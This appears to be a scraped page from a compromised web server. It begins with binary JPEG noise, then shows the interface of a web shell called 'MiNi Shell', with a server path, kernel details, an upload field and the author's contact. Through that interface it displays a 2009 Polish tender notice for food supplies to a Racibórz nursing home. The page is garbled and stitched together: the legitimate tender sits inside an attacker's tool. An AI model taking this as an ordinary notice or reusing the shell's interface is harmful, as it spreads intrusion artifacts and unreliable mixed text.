JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090528/172304-N-2009.html

<p class="kh_header"><b>Racibórz: Dostawa różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 172304 - 2009; data zamieszczenia: 28.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Złota Jesień" , ul. Grzonki 1, 47-400 Racibórz, woj. śląskie, tel. 032 4152001, faks 032 4152001.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Dostawa różnych produktów spożywczych  dla DPS Złota Jesień w asortymencie i ilości jak niżej:
Lp.	Nazwa asortymentu	j.m.	ilość
1.	Budyń  35 g,  różne smaki	szt	1.000
2.	Cukier kryształ	kg	2.000
3.	Cukier puder	kg	20
4.	Cukier waniliowy 32 g	szt	100
5.	Galaretki owocowe 79g , różne smaki	szt	1.000
6.	Herbata miętowa, toreb. 1,2g , pakowana po 20 szt	szt	400
7.	Herbata rozpuszczalna 300g, różne smaki	szt	700
8.	Kakao 100g	szt	80
9.	Kasza gryczana w torebkach	kg	200
10.	Kasza jęczmienna	kg	200
11.	Kasza manna	kg	200
12.	Kawa Inka rozpuszczalna 150g	szt	400
13.	Makaron domowy - nitka cięta, jajeczny	kg	150
14.	Makaron domowy - gwiazdki lub muszelka drobna	kg	150
15.	Mąka pszenna	kg	800
16.	Mąka ziemniaczana	kg	100
17.	Płatki owsiane	kg	150
18.	Płatki ryżowe 200g	szt	20
19.	Ryż	kg	400
20.	Sól	kg	350
21.	Suchary 300 g	szt	50
22.	Chrzan tarty  180 g	szt	100
23.	Ketchup 500g	szt	200
24.	Musztarda      500 g	szt	150
25.	Miód 25 g	szt	5.000
26.	Ocet 10 %  0,5 litra	szt	80
27.	Olej uniwersalny 0,8-0,9litra	szt	350
28.	Czosnek granulowany 20g	szt	30
29.	Gałka muszkatałowa mielona 10 g	szt	20
30.	Kminek 20g	szt	30
31.	Kwasek cytrynowy 50 g	szt	200
32.	Liść laurowy  5g	szt	80
33.	Majeranek  8 g	szt	80
34.	Papryka mielona 15g	szt	80
35.	Pieprz naturalny 20g	szt	320
36.	Proszek do pieczenia  30g	szt	20
37.	Przyprawa typu Jarzynka 200 g	szt	600
38.	Ziele angielskie 15g	szt	100
39.	Żelatyna 50 g 	szt	100
40.	Rodzynki 100 g	szt	20
41.	Wiórki kokosowe 100g	szt	40
42.	Ananas w plastrach puszka 550g	szt	20
43.	Brzoskwinia połówki puszka 800g	szt	40
44.	Groszek konserwowy puszka 400g	szt	300
45.	Groszek z marchewką, słoik 450ml	szt	50
46.	Fasola szparagowa konserwowa, słoik 450 g	szt	500
47.	Kukurydza konserwowa puszka 400g	szt	200
48.	Koncentrat pomidorowy 30% 800g 	szt	150
49.	Ogórek konserwowy słoik 0,8-0,9l	szt	500
50.	Papryka konserwowa słoik 0,8-0,9l	szt	400
51.	Pieczarki konserwowe słoik 0,8-0,9l	szt	100
52.	Kompot wiśniowy 0,8-0,9l	szt	1.000
53.	Kompot śliwkowy 0,8-0,9l	szt	800
54.	Kompot czarna porzeczka 0,8-0,9l	szt	1.000
55.	Kompot truskawkowy 0,8-0,9l	szt	800
56.	Napój niegazowany wielosmakowy 2 l	szt	40
57.	Napój owocowy 0,20 l 	szt	3.000
58.	Sok owocowy 0,20 l 	szt	3.000
59.	Sok na bazie marchewki 0,30 -0,33 l różne smaki	szt	400
60.	Sok owocowy 1l ( pomarańcz, jabłko)	szt	400
61.	Syrop owocowy 400-450g	szt	50
62.	Woda mineralna niegazowana 1,5 l	szt	3.000
63.	Herbata ekspresowa czarna toreb. 1,4g pakowana po 100 torebek
 np.: Saga	szt	400
64.	Herbata z dzikiej róży, toreb. 2g pakowana po 25 torebek 
 np.: Saga	szt	300
65.	Kawa naturalna 250 g np.:Tchibo żółta, 	szt	40
66.	Kawa rozpuszcz. 100g np.Tchibo żółta, 	szt	20
67.	Makaron łazankowy wykonany z wysokiej jakości pszenicy, żółty, po ugotowaniu odpowiednio twardy, sprężysty, wartość energet. w 100g 354 kcal -  np. Lubella, Sorenti	kg	70
68.	Makaron świderki wykonany z wysokiej jakości pszenicy, żółty, po ugotowaniu odpowiednio twardy, sprężysty, wartość energet. w 100g 354 kcal - np. Lubella, Sorenti	kg	200
69.
	Makaron kolanka wykonany z wysokiej jakości pszenicy, żółty, po ugotowaniu odpowiednio twardy, sprężysty, wartość energet. w 100g 354 kcal -np.  Lubella, Sorenti	kg	150
70	Płatki kukurydziane 250 g , wartość odżywcza w 100g  374 kcal, zawartość  kukurydzy 97%- np. Corn Flakes Nestle	szt	400
71	Majonez  400ml wartość odżywcza w 100g 739 kcal, zawartość tłuszczy 80g - np. Winiary	szt	150
72	Koncentrat pomidorowy 30% bez konserwantów 200 g -np. Pudliszki , Łowicz	szt	150
73	Płynna przyprawa do zup, sosów, sałatek 1 kg np.: Winiary	szt	350

B. Ilości  w/w asortymentu określone są szacunkowo  w skali 6- miesięcy i mogą ulec niewielkiej zmianie w zależności od potrzeb zamawiającego. Dostawy zamawiający będzie realizował sukcesywnie średnio raz w tygodniu, w dniu roboczym. Każdą partię dostawy zamawiający będzie uzgadniał telefonicznie z wykonawcą. Dostawca zamówiony towar będzie dostarczał do siedziby zamawiającego własnym transportem na swój koszt w godz. od 7.00- 14.00.
Wszystkie artykuły powinny  być wysokiej jakości, pierwszego gatunku, pierwszej klasy itp. W pozycjach  od 63 określono producenta produktów, zamawiający dopuszcza zaproponowanie produktów innego producenta- marki  o równoważnych   lub lepszych walorach  smakowych, jakościowych i odżywczych.
Możliwości zmiany umowy: Zamawiający dopuszcza waloryzacje cen jednostkowych zaproponowanych w ofercie przez wykonawcę, jednak nie wcześniej niż po upływie 3 miesięcy obowiązywania umowy, w oparciu o wskaźnik wzrostu cen towarów konsumpcyjnych publikowany przez GUS, na wniosek wykonawcy.  Konsekwencją ewentualnych zmian cen jednostkowych jest zmniejszenie ilości dostaw w ramach wartości oferty. Zamawiający dopuszcza zamianę wartości umowy w przypadku ustawowej zmiany podatku VAT przedmiotu umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.32.00.00-7, 15.33.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
posiadają uprawnienia do  wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień ; posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia , lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia; znajdują się w  sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający uzna spełnianie powyższych warunków przez wykonawcę na podstawie złożonego oświadczenia stanowiącego załącznik nr 2 do SIWZ. Ocena spełniania warunków udziału w postępowaniu będzie dokonywana w oparciu o informacje zawarte w oświadczeniu według formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Wykonawcy potwierdzają spełnianie warunków udziału w postępowaniu poprzez dołączenie do oferty oświadczenia sporządzonego według wzoru stanowiącego zał. nr 2 do SIWZ.
B. Inne oświadczenia i dokumenty: 
 Dokumenty wymagane w przypadku składania oferty przez wykonawców  wspólnie  ubiegających się o udzielenie zamówienia:
    a)  dokument ustanawiający pełnomocnika do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia  umowy,
    b) oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 2  składa każdy z wykonawców wspólnie ubiegających się o zamówienie.
C. W przypadku, gdy wykonawca zaproponuje produkty równoważne (poz. 63-73) do oferty należy dołączyć próbki  produktów równoważnych wraz z  opisem tych produktów ( wartości odżywcze, składniki itp.).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatraciborski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Złota Jesień ul. Grzonki 1 47-400 Racibórz, pok nr 4 - sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2009 godzina 14:00, miejsce: Dom Pomocy Społecznej Złota Jesień ul. Grzonki 1 47-400 Racibórz, pok. nr 4 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com